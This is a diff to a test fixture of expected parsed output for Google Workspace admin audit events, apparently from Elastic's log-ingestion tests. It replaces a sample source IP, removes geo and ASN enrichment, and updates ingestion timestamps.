"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_RECOVERY_PHONE", "id": "1", @@ -533,7 +425,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -557,35 +449,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301214500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004834800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "GRANT_ADMIN_PRIVILEGE", "id": "1", @@ -622,7 +496,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -646,35 +520,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301226500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004840200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_ADMIN_PRIVILEGE", "id": "1", @@ -710,7 +566,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -734,35 +590,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301228800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004845700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_ASP", "id": "1", @@ -793,7 +631,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -815,35 +653,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301230700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004851Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TOGGLE_AUTOMATIC_CONTACT_SHARING", "id": "1", @@ -874,7 +694,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -898,35 +718,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301232600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004856400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD", "id": "1", @@ -957,7 +759,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -981,35 +783,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301248800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004862100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "BULK_UPLOAD_NOTIFICATION_SENT", "id": "1", @@ -1046,7 +830,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1070,35 +854,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301251700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004867700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CANCEL_USER_INVITE", "id": "1", @@ -1135,7 +901,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1159,35 +925,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301253600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", + "ingested": "2021-12-09T13:38:57.004873100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}", "provider": "admin", "action": "CHANGE_USER_CUSTOM_FIELD", "id": "1", @@ -1224,7 +972,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1248,35 +996,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301255700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004878500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_EXTERNAL_ID", "id": "1", @@ -1313,7 +1043,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1337,35 +1067,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301257700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004883400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_GENDER", "id": "1", @@ -1402,7 +1114,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1426,35 +1138,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301259500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004886700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_IM", "id": "1", @@ -1491,7 +1185,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1515,35 +1209,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301261200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004891Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_USER_IP_WHITELIST", "id": "1", @@ -1580,7 +1256,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1604,35 +1280,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301263Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004896200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_KEYWORD", "id": "1", @@ -1669,7 +1327,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1693,35 +1351,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301264700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004900900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LANGUAGE", "id": "1", @@ -1758,7 +1398,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 